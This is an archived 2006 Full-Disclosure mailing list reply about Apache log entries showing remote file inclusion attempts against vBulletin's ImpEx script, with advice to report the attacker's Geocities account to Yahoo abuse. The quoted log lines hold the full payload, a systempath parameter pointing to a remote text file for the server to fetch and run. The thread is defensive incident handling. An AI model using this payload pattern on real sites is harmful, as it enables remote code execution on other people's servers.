Re: [Full-disclosure] attempts from 82.165.30.80

From: "ad@xxxxxxxxxxxxxxxx" <ad@xxxxxxxxxxxxxxxx>
Date: Mon, 03 Apr 2006 21:09:41 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

you should use this

http://help.yahoo.com/help/us/geo/abuse/abuse-04.html

or

http://add.yahoo.com/fast/help/abuse/cgi_abuse

explaining them the user "deverificat3" is using a geocities account
to scan the recent vbulletin vulnerability [1]

Konstantine wrote:
> These started to show up on Apache logs recently. Are these attempts
> to exploit [1]? Does it worth contacting the owner of the website at
> this address?
>
> 82.165.30.80 - - [02/Apr/2006:11:30:21 +0100] "GET
> /forum/impex/ImpExData.php?systempath=http://geocities.com/deverificat3/t.txt?&
> HTTP/1.1" 404 1054
> 82.165.30.80 - - [02/Apr/2006:11:30:24 +0100] "GET
> /impex/ImpExData.php?systempath=http://geocities.com/deverificat3/t.txt?&
> HTTP/1.1" 404 1054
> 82.165.30.80 - - [02/Apr/2006:11:30:25 +0100] "GET
> /forums/impex/ImpExData.php?systempath=http://geocities.com/deverificat3/t.txt?&
> HTTP/1.1" 404 1054
>
>
> [1] http://lists.grok.org.uk/pipermail/full-disclosure/2006-March/044318.html
>
> ----------------------------------------------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.1 (MingW32)

iD8DBQFEMXL1FJS99fNfR+YRAmktAJ90+JguXr+TsYZoaPrkAmyxPu/HkgCeKvje
8sjwiPS1Qb22XaY+hFay6ho=
=6l2d
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] attempts from 82.165.30.80
  - From: Konstantine

Prev by Date: [Full-disclosure] attempts from 82.165.30.80
Next by Date: Re: [Full-disclosure] Critical PHP bug - act ASAP if you are runningweb with sen
Previous by thread: [Full-disclosure] attempts from 82.165.30.80
Next by thread: Re: [Full-disclosure] Critical PHP bug - act ASAP if you are runningweb with sen
Index(es):
- Date
- Thread

Relevant Pages

Re: [Full-disclosure] List of Fuzzers
... int authenticate(char* username, char* password) { ... that fuzzing has its limitations (that can be fixed and applied like ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
(Full-Disclosure)
Re: [Full-disclosure] List of Fuzzers
... valid to use someone else's fuzzing framework against one's own ... I see "Which fuzzer on this list will help me find the most ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
(Full-Disclosure)
Re: [Full-disclosure] List of Fuzzers
... valid to use someone else's fuzzing framework against one's own ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
(Full-Disclosure)
[Full-disclosure] List Charter
... This document serves as a charter for the [Full-Disclosure] mailing ... Typically posting will be ... members may be removed from the list by the management. ...
(Full-Disclosure)
[Full-disclosure] List Charter
... This document serves as a charter for the [Full-Disclosure] mailing ... Typically posting will be ... members may be removed from the list by the management. ...
(Full-Disclosure)